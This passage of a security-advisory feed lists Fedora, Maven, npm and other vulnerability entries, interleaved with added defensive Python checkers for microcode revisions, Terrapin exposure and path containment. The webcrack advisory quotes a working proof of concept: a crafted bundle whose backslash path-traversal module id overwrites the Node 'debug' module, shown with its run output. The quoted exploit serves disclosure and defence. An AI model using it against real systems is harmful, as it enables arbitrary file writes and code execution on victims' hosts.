Update of 06-96-01/0x01 (EHL B1) microcode from revision 0x17 up to 0x19;
Update of 06-97-02/0x07 (ADL-HX/S 8+8 C0) microcode from revision 0x32 up to 0x35;
Update of 06-97-05/0x07 (ADL-S 6+0 K0) microcode (in intel-ucode/06-97-02) from revision 0x32 up to 0x35;
Update of 06-bf-02/0x07 (ADL C0) microcode (in intel-ucode/06-97-02) from revision 0x32 up to 0x35;
Update of 06-bf-05/0x07 (ADL C0) microcode (in intel-ucode/06-97-02) from revision 0x32 up to 0x35;
Update of 06-97-02/0x07 (ADL-HX/S 8+8 C0) microcode (in intel-ucode/06-97-05) from revision 0x32 up to 0x35;
Update of 06-97-05/0x07 (ADL-S 6+0 K0) microcode from revision 0x32 up to 0x35;
Update of 06-bf-02/0x07 (ADL C0) microcode (in intel-ucode/06-97-05) from revision 0x32 up to 0x35;
Update of 06-bf-05/0x07 (ADL C0) microcode (in intel-ucode/06-97-05) from revision 0x32 up to 0x35;
Update of 06-9a-03/0x80 (ADL-P 6+8/U 9W L0/R0) microcode from revision 0x430 up to 0x433;
Update of 06-9a-04/0x80 (ADL-P 2+8 R0) microcode (in intel-ucode/06-9a-03) from revision 0x430 up to 0x433;
Update of 06-9a-03/0x80 (ADL-P 6+8/U 9W L0/R0) microcode (in intel-ucode/06-9a-04) from revision 0x430 up to 0x433;
Update of 06-9a-04/0x80 (ADL-P 2+8 R0) microcode from revision 0x430 up to 0x433;
Update of 06-9a-04/0x40 (AZB A0) microcode from revision 0x5 up to 0x7;
Update of 06-9c-00/0x01 (JSL A0/A1) microcode from revision 0x24000024 up to 0x24000026;
Update of 06-9e-09/0x2a (KBL-G/H/S/X/Xeon E3 B0) microcode from revision 0xf4 up to 0xf8;
Update of 06-9e-0a/0x22 (CFL-H/S/Xeon E U0) microcode from revision 0xf4 up to 0xf6;
Update of 06-9e-0c/0x22 (CFL-H/S/Xeon E P0) microcode from revision 0xf4 up to 0xf6;
Update of 06-9e-0d/0x22 (CFL-H/S/Xeon E R0) microcode from revision 0xfa up to 0xfc;
Update of 06-a5-02/0x20 (CML-H R1) microcode from revision 0xf8 up to 0xfa;
Update of 06-a5-03/0x22 (CML-S 6+2 G1) microcode from revision 0xf8 up to 0xfa;
Update of 06-a5-05/0x22 (CML-S 10+2 Q0) microcode from revision 0xf8 up to 0xfa;
Update of 06-a6-00/0x80 (CML-U 6+2 A0) microcode from revision 0xf8 up to 0xfa;
Update of 06-a6-01/0x80 (CML-U 6+2 v2 K1) microcode from revision 0xf8 up to 0xfa;
Update of 06-a7-01/0x02 (RKL-S B0) microcode from revision 0x5d up to 0x5e;
Update of 06-b7-01/0x32 (RPL-S B0) microcode from revision 0x11d up to 0x123;
Update of 06-ba-02/0xe0 (RPL-H 6+8/P 6+8 J0) microcode from revision 0x411c up to 0x4121;
Update of 06-ba-03/0xe0 (RPL-U 2+8 Q0) microcode (in intel-ucode/06-ba-02) from revision 0x411c up to 0x4121;
Update of 06-ba-02/0xe0 (RPL-H 6+8/P 6+8 J0) microcode (in intel-ucode/06-ba-03) from revision 0x411c up to 0x4121;
Update of 06-ba-03/0xe0 (RPL-U 2+8 Q0) microcode from revision 0x411c up to 0x4121;
Update of 06-be-00/0x11 (ADL-N A0) microcode from revision 0x12 up to 0x17;
Update of 06-97-02/0x07 (ADL-HX/S 8+8 C0) microcode (in intel-ucode/06-bf-02) from revision 0x32 up to 0x35;
Update of 06-97-05/0x07 (ADL-S 6+0 K0) microcode (in intel-ucode/06-bf-02) from revision 0x32 up to 0x35;
Update of 06-bf-02/0x07 (ADL C0) microcode from revision 0x32 up to 0x35;
Update of 06-bf-05/0x07 (ADL C0) microcode (in intel-ucode/06-bf-02) from revision 0x32 up to 0x35;
Update of 06-97-02/0x07 (ADL-HX/S 8+8 C0) microcode (in intel-ucode/06-bf-05) from revision 0x32 up to 0x35;
Update of 06-97-05/0x07 (ADL-S 6+0 K0) microcode (in intel-ucode/06-bf-05) from revision 0x32 up to 0x35;
Update of 06-bf-02/0x07 (ADL C0) microcode (in intel-ucode/06-bf-05) from revision 0x32 up to 0x35;
Update of 06-bf-05/0x07 (ADL C0) microcode from revision 0x32 up to 0x35.
Addresses CVE-2023-22655, CVE-2023-23583, CVE-2023-28746, CVE-2023-38575, CVE-2023-39368, CVE-2023-42667, CVE-2023-43490, CVE-2023-45733, CVE-2023-46103, CVE-2023-49141 | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-f3692f8528
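The advisory above keys every entry as ff-mm-ss/pf (hex family-model-stepping and platform-id mask) with a "from revision ... up to ..." pair, which is all that is needed to tell whether a host has actually picked up the update. The following is an added example, not code from the Fedora advisory or microcode_ctl: it parses /proc/cpuinfo (which reports family, model and stepping in decimal and the loaded microcode revision in hex), builds the advisory's signature form, and compares the loaded revision with the advisory's "up to" value. MIN_REVISION is a hand-transcribed subset of the entries above and CPUINFO_SAMPLE is a constructed excerpt. One caveat the check cannot cover by itself: the platform id is not exposed in /proc/cpuinfo (it lives in the IA32_PLATFORM_ID MSR), so a signature the advisory lists with more than one /pf value, such as 06-9a-04 (0x433 for /0x80 but 0x7 for /0x40), needs that extra lookup before the number here is trusted.

```python
"""Compare the loaded Intel microcode revision with a microcode_ctl advisory.

Added example, not part of the Fedora advisory. MIN_REVISION is a subset of the
advisory's "up to" revisions; CPUINFO_SAMPLE is a constructed /proc/cpuinfo
excerpt. The platform-id mask (/pf) is not checked here because /proc/cpuinfo
does not expose it; it is noted in the comments for each entry.
"""

# signature -> minimum revision from the advisory (platform id in the comment)
MIN_REVISION = {
    "06-8c-01": 0xb6,        # TGL-UP3/UP4 B1, pf 0x80
    "06-8e-0c": 0xfa,        # AML-Y / CML-U / WHL-U V0, pf 0x94
    "06-8f-08": 0x2b0005c0,  # SPR-SP E5/S3, pf 0x87
    "06-9a-03": 0x433,       # ADL-P 6+8 / U 9W L0/R0, pf 0x80
    "06-b7-01": 0x123,       # RPL-S B0, pf 0x32
    "06-ba-02": 0x4121,      # RPL-H/P 6+8 J0, pf 0xe0
}

# Constructed /proc/cpuinfo excerpt: two logical CPUs of a Tiger Lake part
# (family 6, model 140 = 0x8c, stepping 1) still on revision 0xb4.
CPUINFO_SAMPLE = """\
processor\t: 0
vendor_id\t: GenuineIntel
cpu family\t: 6
model\t\t: 140
model name\t: 11th Gen Intel(R) Core(TM) i7-1185G7 @ 3.00GHz
stepping\t: 1
microcode\t: 0xb4

processor\t: 1
vendor_id\t: GenuineIntel
cpu family\t: 6
model\t\t: 140
model name\t: 11th Gen Intel(R) Core(TM) i7-1185G7 @ 3.00GHz
stepping\t: 1
microcode\t: 0xb4
"""


def parse_cpuinfo(text):
    """Yield one {field: value} dict per processor block."""
    for block in text.strip().split("\n\n"):
        fields = {}
        for line in block.splitlines():
            key, _, value = line.partition(":")
            fields[key.strip()] = value.strip()
        yield fields


def signature(fields):
    """ff-mm-ss as the advisory writes it, built from cpuinfo's decimal values."""
    return "{:02x}-{:02x}-{:02x}".format(int(fields["cpu family"]),
                                         int(fields["model"]),
                                         int(fields["stepping"]))


def check_cpuinfo(text, table=MIN_REVISION):
    """Return {signature: (lowest loaded revision, required, up_to_date)}
    for every Intel CPU whose signature the table covers."""
    results = {}
    for fields in parse_cpuinfo(text):
        if fields.get("vendor_id") != "GenuineIntel":
            continue
        sig = signature(fields)
        if sig not in table:
            continue
        loaded = int(fields["microcode"], 16)
        if sig in results:                      # keep the worst CPU of a signature
            loaded = min(loaded, results[sig][0])
        required = table[sig]
        results[sig] = (loaded, required, loaded >= required)
    return results


def check_host(path="/proc/cpuinfo"):
    """Run the comparison against the live host."""
    with open(path) as fh:
        return check_cpuinfo(fh.read())


if __name__ == "__main__":
    for sig, (loaded, required, ok) in check_cpuinfo(CPUINFO_SAMPLE).items():
        print(f"{sig}: loaded 0x{loaded:x}, advisory 0x{required:x}: "
              f"{'current' if ok else 'UPDATE NEEDED'}")
```

Run `check_host()` on a Fedora box after installing the update and rebooting (or after an early-load initramfs refresh); a revision below the advisory's value means the new microcode file was installed but never loaded into the CPU.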
13.08.2024 04:35:31 | fedora | [FEDORA-2024-e27230c6c3] Fedora 39: python3.6 | Security fix for CVE-2024-6345 in the bundled setuptools wheel. | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e27230c6c3
13.08.2024 04:35:29 | fedora | [FEDORA-2024-19f696f0ca] Fedora 39: python2.7 | Security fix for CVE-2024-6345 in the bundled setuptools wheel. | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-19f696f0ca
13.08.2024 04:35:28 | fedora | [FEDORA-2024-c5152808e4] Fedora 39: pypy | Update to 7.3.16 (https://doc.pypy.org/en/latest/release-v7.3.16.html#changelog). Security fix for CVE-2024-6345. | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-c5152808e4
12.08.2024 22:52:16 | maven | [MAVEN:GHSA-2326-HX7G-3M9R] Apache MINA SSHD: integrity check bypass (high) | Like many other SSH implementations, Apache MINA SSHD suffered from the issue that is more widely known as CVE-2023-48795. An attacker that can intercept traffic between client and server could drop certain packets from the stream, potentially causing client and server to consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. The mitigations to prevent this type of attack were implemented in Apache MINA SSHD 2.12.0, both client and server side. Users are recommended to upgrade to at least this version. Note that both the client and the server implementation must have mitigations applied against this issue, otherwise the connection may still be affected. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-2326-HX7G-3M9R
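The MINA SSHD entry says the mitigation has to be present on both sides, but not how to tell from the outside whether a given peer has it. The following is an added example, not code from Apache MINA SSHD or the advisory. It works from the KEXINIT message, which is the first binary packet each side sends and goes out before any key is in place, so it can be read with a plain socket. The mitigation patched implementations (MINA SSHD 2.12.0 among them) negotiate is the OpenSSH "strict kex" extension, advertised as the pseudo-algorithms kex-strict-s-v00@openssh.com (server) and kex-strict-c-v00@openssh.com (client) in the kex_algorithms name-list; the prefix-truncation attack needs ChaCha20-Poly1305, or a CBC cipher combined with an Encrypt-then-MAC MAC, to be the negotiated mode. The sample KEXINITs are constructed with the block's own build_kexinit(); the host name in the usage comment is a placeholder.

```python
"""Check an SSH peer's KEXINIT for Terrapin (CVE-2023-48795) exposure.

Added example; not code from Apache MINA SSHD or the advisory. The samples at
the bottom are constructed; fetch_server_kexinit() is the live-network path.
"""
import socket
import struct

SSH_MSG_KEXINIT = 20
STRICT_KEX = {"server": "kex-strict-s-v00@openssh.com",
              "client": "kex-strict-c-v00@openssh.com"}
FIELDS = ("kex", "hostkey", "enc_c2s", "enc_s2c", "mac_c2s", "mac_s2c",
          "comp_c2s", "comp_s2c", "lang_c2s", "lang_s2c")


def build_kexinit(kex, hostkeys, ciphers, macs, compression=("none",)):
    """Serialise a KEXINIT payload (RFC 4253 section 7.1). Used only to build
    the samples; a real check takes the bytes from the wire."""
    def namelist(names):
        data = ",".join(names).encode("ascii")
        return struct.pack(">I", len(data)) + data
    body = bytes([SSH_MSG_KEXINIT]) + bytes(16)          # message id + zeroed cookie
    for names in (kex, hostkeys, ciphers, ciphers, macs, macs,
                  compression, compression, (), ()):
        body += namelist(names)
    return body + b"\x00" + struct.pack(">I", 0)         # first_kex_packet_follows, reserved


def parse_kexinit(payload):
    """Decode the ten name-lists of a KEXINIT payload into a dict of lists."""
    if not payload or payload[0] != SSH_MSG_KEXINIT:
        raise ValueError("not a KEXINIT payload")
    off, fields = 17, {}                                 # skip id byte + 16-byte cookie
    for name in FIELDS:
        (n,) = struct.unpack_from(">I", payload, off)
        off += 4
        fields[name] = [a for a in payload[off:off + n].decode("ascii").split(",") if a]
        off += n
    return fields


def assess(fields, role):
    """Classify one peer. role is 'server' or 'client' and selects which
    strict-kex marker that peer is expected to advertise."""
    ciphers = set(fields["enc_c2s"]) | set(fields["enc_s2c"])
    macs = set(fields["mac_c2s"]) | set(fields["mac_s2c"])
    strict = STRICT_KEX[role] in fields["kex"]
    chacha = "chacha20-poly1305@openssh.com" in ciphers
    cbc_etm = (any(c.endswith("-cbc") for c in ciphers)
               and any(m.endswith("-etm@openssh.com") for m in macs))
    return {"strict_kex": strict,
            "offers_chacha20_poly1305": chacha,
            "offers_cbc_with_etm": cbc_etm,
            "exploitable_if_negotiated": (chacha or cbc_etm) and not strict}


def connection_protected(client_fields, server_fields):
    """Strict kex only takes effect when both sides advertise it, which is the
    advisory's point about patching client and server."""
    return (STRICT_KEX["client"] in client_fields["kex"]
            and STRICT_KEX["server"] in server_fields["kex"])


def fetch_server_kexinit(host, port=22, timeout=5.0):
    """Do the version exchange and return the payload of the server's first
    binary packet, its KEXINIT. No crypto is involved at this point."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(b"SSH-2.0-terrapin-check\r\n")
        f = sock.makefile("rb")
        line = f.readline()
        while line and not line.startswith(b"SSH-"):     # servers may send banner lines first
            line = f.readline()
        (packet_len,) = struct.unpack(">I", f.read(4))
        body = f.read(packet_len)                        # padding_length, payload, padding
        return body[1:packet_len - body[0]]


# Constructed samples: an unpatched server, and a patched client/server pair,
# all offering the modes Terrapin needs.
COMMON = dict(hostkeys=["ssh-ed25519"],
              ciphers=["chacha20-poly1305@openssh.com", "aes128-ctr", "aes256-cbc"],
              macs=["hmac-sha2-256-etm@openssh.com", "hmac-sha2-256"])
UNPATCHED_SERVER = build_kexinit(["curve25519-sha256"], **COMMON)
PATCHED_SERVER = build_kexinit(["curve25519-sha256", STRICT_KEX["server"]], **COMMON)
PATCHED_CLIENT = build_kexinit(["curve25519-sha256", STRICT_KEX["client"]], **COMMON)

if __name__ == "__main__":
    print(assess(parse_kexinit(UNPATCHED_SERVER), "server"))
    # live check against a real host (placeholder name):
    # print(assess(parse_kexinit(fetch_server_kexinit("ssh.example.org")), "server"))
```

The check reports what a peer offers, not what a particular session negotiated; a server that lacks strict kex but only offers AES-GCM or CTR with plain HMAC is still worth patching, but it is not exposed to the downgrade the advisory describes.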
12.08.2024 22:25:26 | maven | [MAVEN:GHSA-4VV4-CRW4-8PCW] Apache DolphinScheduler: Resource File Read And Write Vulnerability (high) | File read and write vulnerability in Apache DolphinScheduler; authenticated users can illegally access additional resource files. This issue affects Apache DolphinScheduler from 3.1.0 before 3.2.2. Users are recommended to upgrade to version 3.2.2, which fixes the issue. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4VV4-CRW4-8PCW
12.08.2024 22:21:36 | maven | [MAVEN:GHSA-M9Q4-P56M-MC6Q] Apache DolphinScheduler: RCE by arbitrary js execution (high) | Improper Input Validation vulnerability in Apache DolphinScheduler. An authenticated user can cause arbitrary, unsandboxed JavaScript to be executed on the server. If you are using the switch task plugin, please upgrade to version 3.2.2. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-M9Q4-P56M-MC6Q
12.08.2024 20:26:46 | npm | [NPM:GHSA-8HC4-VH64-CXMJ] Server-Side Request Forgery in axios (high) | axios 1.7.2 allows SSRF via unexpected behavior where requests for path relative URLs get processed as protocol relative URLs. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-8HC4-VH64-CXMJ
12.08.2024 07:59:45 | fedora | [FEDORA-2024-4fcf85b0ff] Fedora 39: firefox, nss | Update NSS to 3.103.0. Update to Firefox 129.0. | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-4fcf85b0ff
12.08.2024 07:59:43 | fedora | [FEDORA-2024-b60f51180f] Fedora 39: chromium | Update to 127.0.6533.99. Critical CVE-2024-7532: Out of bounds memory access in ANGLE; High CVE-2024-7533: Use after free in Sharing; High CVE-2024-7550: Type Confusion in V8; High CVE-2024-7534: Heap buffer overflow in Layout; High CVE-2024-7535: Inappropriate implementation in V8; High CVE-2024-7536: Use after free in WebAudio. | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-b60f51180f
12.08.2024 07:58:59 | fedora | [FEDORA-2024-7250fa4a78] Fedora 39: neatvnc | New version; RHBZ #2302449, #2302450 | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-7250fa4a78
12.08.2024 04:38:05 | fedora | [FEDORA-2024-7f0a88301b] Fedora 40: nss, firefox | Update NSS to 3.103.0. Update to Firefox 129.0. | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-7f0a88301b
12.08.2024 04:38:02 | fedora | [FEDORA-2024-bec5d0df1f] Fedora 40: python3.13 | Security fix for CVE-2024-6923. Fix SystemError in PyEval_GetLocals(). | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-bec5d0df1f
12.08.2024 04:37:50 | fedora | [FEDORA-2024-1fbf7f22e0] Fedora 40: neatvnc | New version; RHBZ #2302449, #2302450 | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-1fbf7f22e0
12.08.2024 11:10:20 | almalinux | [ALSA-2024:5193] httpd:2.4 security update (important) | httpd:2.4 security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:5193
12.08.2024 03:00:00 | debian | [DSA-5747-1] linux | security update | https://secdb.nttzen.cloud/security-advisory/debian/DSA-5747-1
12.08.2024 03:00:00 | redhat | [RHSA-2024:5193] httpd:2.4 security update (important) | The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server. Security Fix(es): * httpd: Security issues via backend applications whose response headers are malicious or exploitable (CVE-2024-38476). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:5193
12.08.2024 03:00:00 | redhat | [RHSA-2024:5192] 389-ds-base security update (moderate) | 389 Directory Server is an LDAP version 3 (LDAPv3) compliant server. The base packages include the Lightweight Directory Access Protocol (LDAP) server and command-line utilities for server administration. Security Fix(es): * 389-ds-base: Malformed userPassword hash may cause Denial of Service (CVE-2024-5953); * 389-ds-base: unauthenticated user can trigger a DoS by sending a specific extended search request (CVE-2024-6237). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:5192
11.08.2024 06:30:22 | fedora | [FEDORA-2024-0c063be1cc] Fedora 39: frr | New version 8.5.5 | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-0c063be1cc
11.08.2024 06:30:20 | fedora | [FEDORA-2024-9ed182a5d3] Fedora 39: python-setuptools | Security fix for CVE-2024-6345. | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-9ed182a5d3
13.08.2024 22:23:51 | npm | [NPM:GHSA-P734-XG27-8CFQ] Prototype pollution in izatop bunt (critical) | izatop bunt v0.29.19 was discovered to contain a prototype pollution via the component /esm/qs.js. This vulnerability allows attackers to execute arbitrary code via injecting arbitrary properties. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-P734-XG27-8CFQ
14.08.2024 21:11:54 | npm | [NPM:GHSA-QM2Q-9F3Q-2VCV] Trix has a cross-site Scripting vulnerability on copy & paste (moderate) | The Trix editor, versions prior to 2.1.4, is vulnerable to XSS when pasting malicious code. This vulnerability is a bypass of the fix put in place for https://github.com/basecamp/trix/security/advisories/GHSA-qjqp-xr96-cj99. In https://github.com/basecamp/trix/pull/1149, we added sanitation for Trix attachments with a `text/html` content type. However, Trix only checks the content type on the paste event's `dataTransfer` object. As long as the `dataTransfer` has a content type of `text/html`, Trix parses its contents and creates an `Attachment` with them, even if the attachment itself doesn't have a `text/html` content type. Trix then uses the attachment content to set the attachment element's `innerHTML`.

### Impact

An attacker could trick a user to copy and paste malicious code that would execute arbitrary JavaScript code within the context of the user's session, potentially leading to unauthorized actions being performed or sensitive information being disclosed.

### Patches

**Update Recommendation:** Users should upgrade to Trix editor version 2.1.4 or later, which incorporates proper sanitization of input from copied content.

### Workarounds

This is not really a workaround but something that should be considered in addition to upgrading to the patched version. If affected users can disallow browsers that don't support a Content Security Policy, then this would be an effective workaround for this and all XSS vulnerabilities. Set CSP policies such as `script-src 'self'` to ensure that only scripts hosted on the same origin are executed, and explicitly prohibit inline scripts using `script-src-elem`.

### References

* https://github.com/basecamp/trix/pull/1156
* https://github.com/basecamp/trix/releases/tag/v2.1.4
* https://github.com/basecamp/trix/pull/1149
* https://github.com/basecamp/trix/security/advisories/GHSA-qjqp-xr96-cj99
* [MDN docs for `DataTransfer`](https://developer.mozilla.org/en-US/docs/Web/API/DataTransfer)

### Credits

This vulnerability was reported by HackerOne researcher [thwin_htet](https://hackerone.com/thwin_htet?type=user). | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-QM2Q-9F3Q-2VCV
14.08.2024 23:52:28 | npm | [NPM:GHSA-CCQH-278P-XQ6W] webcrack has an Arbitrary File Write Vulnerability on Windows when Parsing and Saving a Malicious Bundle (high) |

### Summary

An arbitrary file write vulnerability exists in the webcrack module when processing specifically crafted malicious code on Windows systems. This vulnerability is triggered when using the unpack bundles feature in conjunction with the saving feature. If a module name includes a path traversal sequence with Windows path separators, an attacker can exploit this to overwrite files on the host system.

### Details

Source: [packages/webcrack/src/unpack/bundle.ts#L79](https://github.com/j4k0xb/webcrack/blob/241f9469e6401f3dabc6373233d85a5e76966b54/packages/webcrack/src/unpack/bundle.ts#L79)

```ts
import { posix } from 'node:path';
import type { Module } from './module';

// eslint-disable-next-line @typescript-eslint/unbound-method
const { dirname, join, normalize } = posix;

/* ... snip ... */

// posix.normalize() leaves '\' alone, so a module.path built from backslashes
// still starts with `path` after normalisation and passes this check
const modulePath = normalize(join(path, module.path));
if (!modulePath.startsWith(path)) {
  throw new Error(`detected path traversal: ${module.path}`);
}
await mkdir(dirname(modulePath), { recursive: true });
await writeFile(modulePath, module.code, 'utf8');
```

In this code, the application explicitly relies on the POSIX version of path utilities (`dirname`, `join`, `normalize`) from Node.js. However, the vulnerability arises because the POSIX version of the `normalize` function does not recognize `\` as a path separator. As a result, on Windows systems, the path traversal check fails, allowing an attacker to write files to unintended locations.

### PoC

The following proof of concept demonstrates how this vulnerability can be exploited to overwrite and hijack the `debug` module in Node.js:

**Malicious Script (what.js):**

```js
(function (e) {
  var n = {};
  function o(r) {
    if (n[r]) {
      return n[r].exports;
    }
    var a = (n[r] = {
      i: r,
      l: false,
      exports: {},
    });
    e[r].call(a.exports, a, a.exports, o);
    a.l = true;
    return a.exports;
  }
  o.p = '';
  o((o.s = 386));
})({
  // module id with Windows separators: written to ../node_modules/debug/src/index.js
  './\\..\\node_modules\\debug\\src\\index': function (e, t, n) {
    module.exports = () => console.log("pwned")
  },
});
```

**Webcrack Script (index.js):**

```js
import fs from 'fs';
import { webcrack } from 'webcrack';

const input = fs.readFileSync('what.js', 'utf8');
const result = await webcrack(input);
console.log(result.code);
console.log(result.bundle);
await result.save('output-dir');
```

**Execution:**

Running the above script with `node index.js` twice results in the following output being printed to the terminal:

```
PS C:\Webcrack> node .\index.js
Debugger attached.
(function (e) { var n = {}; function o(r) { if (n[r]) { return n[r].exports; } var a = n[r] = { i: r, l: false, exports: {} }; e[r].call(a.exports, a, a.exports, o); a.l = true; return a.exports; } o.p = ""; o(o.s = 386);})({ "./\\..\\node_modules\\debug\\src\\index": function (e, t, n) { module.exports = () => console.log("pwned"); }});
WebpackBundle { type: 'webpack', entryId: '386', modules: Map(1) { './\\..\\node_modules\\debug\\src\\index' => WebpackModule { id: './\\..\\node_modules\\debug\\src\\index', isEntry: false, path: '././\\..\\node_modules\\debug\\src\\index.js', ast: [Object] } }}
Waiting for the debugger to disconnect...
PS C:\Webcrack> node .\index.js
Debugger attached.
pwned
pwned
pwned
pwned
pwned
pwned
pwned
Waiting for the debugger to disconnect...
file:///C:/Webcrack/node_modules/webcrack/dist/index.js:444
  if (options.log) logger(`${name}: started`);
                   ^

TypeError: logger is not a function
    at applyTransforms (file:///C:/Webcrack/node_modules/webcrack/dist/index.js:444:20)
    at Array.<anonymous> (file:///C:/Webcrack/node_modules/webcrack/dist/index.js:4259:7)
    at webcrack (file:///C:/Webcrack/node_modules/webcrack/dist/index.js:4292:20)
    at async file:///C:/Webcrack/index.js:6:16

Node.js v18.16.0
```

This demonstrates that the debug module was successfully overwritten and hijacked to print `pwned` to the console, confirming the arbitrary file write vulnerability has led to code execution.

### Impact

This vulnerability allows an attacker to write arbitrary `.js` files to the host system, which can be leveraged to hijack legitimate Node.js modules to gain arbitrary code execution. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-CCQH-278P-XQ6W
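The webcrack advisory's root cause is a containment check run under one platform's path rules while the write happens under another's. The following is an added example, not code from webcrack: Python's `posixpath` and `ntpath` modules implement the same separator rules as Node's `path.posix` and `path.win32`, so the bug can be reproduced and the hardened form shown without a Windows host. It takes the module id from the PoC bundle above (with the `.js` the unpacker appends, as the `path:` field in the output shows), reproduces the vulnerable `normalize + startsWith` logic, shows where the Windows filesystem actually puts that string, and then a `safe_join` that rejects foreign separators, normalises with the host's own rules and checks containment with `commonpath`. The last point goes a little beyond the advisory: a bare `startsWith("output-dir")` is also satisfied by `output-dir2/...`, so the constructed `PREFIX_TRICK` id escapes even with forward slashes. `OUT` is an assumed output directory name.

```python
"""Path containment: POSIX normalisation vs. the Windows filesystem.

Added example, not code from webcrack. posixpath/ntpath stand in for Node's
path.posix/path.win32. MALICIOUS_ID comes from the advisory's PoC bundle;
BENIGN_ID, PREFIX_TRICK and OUT are constructed for the demonstration.
"""
import ntpath
import os
import posixpath

OUT = "output-dir"
MALICIOUS_ID = "./\\..\\node_modules\\debug\\src\\index.js"  # PoC module id + '.js'
BENIGN_ID = "./src/app.js"
PREFIX_TRICK = "../output-dir2/evil.js"  # escapes OUT yet still startswith("output-dir")


def webcrack_style_check(base, module_id):
    """The vulnerable logic from bundle.ts: POSIX normalise, then startsWith.
    Returns (accepted, path that would be passed to writeFile)."""
    target = posixpath.normpath(posixpath.join(base, module_id))
    return target.startswith(base), target


def where_windows_writes(base, module_id):
    """Where the same string lands once Windows treats '\\' as a separator."""
    return ntpath.normpath(ntpath.join(base, module_id))


def safe_join(base, module_id, pm=os.path):
    """Hardened containment check. `pm` selects the path rules: os.path on
    the real host, ntpath here to simulate Windows on any platform.

    1. reject what the bundle format never legitimately contains: backslashes,
       drive/stream colons, NUL bytes, absolute paths
    2. normalise with the host's own rules, never a fixed POSIX flavour
    3. compare with commonpath, which unlike startswith is not fooled by a
       sibling directory whose name merely begins with the base name
    """
    if any(bad in module_id for bad in ("\\", ":", "\x00")) or pm.isabs(module_id):
        raise ValueError(f"rejected module id: {module_id!r}")
    target = pm.normpath(pm.join(base, module_id))
    if pm.commonpath([base, target]) != pm.normpath(base):
        raise ValueError(f"detected path traversal: {module_id!r}")
    return target


def is_rejected(base, module_id, pm=os.path):
    """True when safe_join refuses the id (convenience for tests and scripts)."""
    try:
        safe_join(base, module_id, pm)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    accepted, target = webcrack_style_check(OUT, MALICIOUS_ID)
    print("vulnerable check accepts:", accepted, "->", target)
    print("Windows actually writes:", where_windows_writes(OUT, MALICIOUS_ID))
    for mid in (BENIGN_ID, MALICIOUS_ID, PREFIX_TRICK, "/etc/passwd"):
        print(f"{mid!r}: {'rejected' if is_rejected(OUT, mid, ntpath) else 'allowed'}")
```

On a real host drop the `pm` argument so `os.path` applies the rules of the filesystem the file is about to be written to; that, rather than any particular separator list, is the general lesson of the advisory.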
14.08.2024 18:15:31 | alpinelinux | [ALPINE:CVE-2024-7347] nginx vulnerability (medium) | [From CVE-2024-7347] NGINX Open Source and NGINX Plus have a vulnerability in the ngx_http_mp4_module, which might allow an attacker to over-read NGINX worker memory resulting in its termination, using a specially crafted mp4 file. The issue only affects NGINX if it is built with the ngx_http_mp4_module and the mp4 directive is used in the configuration file. Additionally, the attack is possible only if an attacker can trigger the processing of a specially crafted mp4 file with the ngx_http_mp4_module. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. | https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-7347
14.08.2024 09:26:34 | fedora | [FEDORA-2024-0462a59d45] Fedora 40: chromium (high) | Update to 127.0.6533.99. Critical CVE-2024-7532: Out of bounds memory access in ANGLE; High CVE-2024-7533: Use after free in Sharing; High CVE-2024-7550: Type Confusion in V8; High CVE-2024-7534: Heap buffer overflow in Layout; High CVE-2024-7535: Inappropriate implementation in V8; High CVE-2024-7536: Use after free in WebAudio. | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-0462a59d45
14.08.2024 03:00:00 | debian | [DSA-5748-1] ffmpeg (high) | security update | https://secdb.nttzen.cloud/security-advisory/debian/DSA-5748-1
14.08.2024 03:00:00 | debian | [DSA-5749-1] flatpak | security update | https://secdb.nttzen.cloud/security-advisory/debian/DSA-5749-1
14.08.2024 19:09:13 | almalinux | [ALSA-2024:5258] container-tools:rhel8 security update (important) | container-tools:rhel8 security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:5258
14.08.2024 03:00:00 | freebsd | [FREEBSD:9D8E9952-5A42-11EF-A219-1C697A616631] Intel CPUs -- multiple vulnerabilities (high) | Intel reports: A potential security vulnerability in SMI Transfer monitor (STM) may allow escalation of privilege. Intel has released microcode updates to mitigate this potential vulnerability. A potential security vulnerability in some 3rd Generation Intel Xeon Scalable Processors may allow denial of service. Intel has released microcode updates to mitigate this potential vulnerability. A potential security vulnerability in some 3rd, 4th, and 5th Generation Intel Xeon Processors may allow escalation of privilege. Intel has released firmware updates to mitigate this potential vulnerability. A potential security vulnerability in the Intel Core Ultra Processor stream cache mechanism may allow escalation of privilege. Intel has released microcode updates to mitigate this potential vulnerability. A potential security vulnerability in some Intel Processor stream cache mechanisms may allow escalation of privilege. Intel has released microcode updates to mitigate this potential vulnerability. | 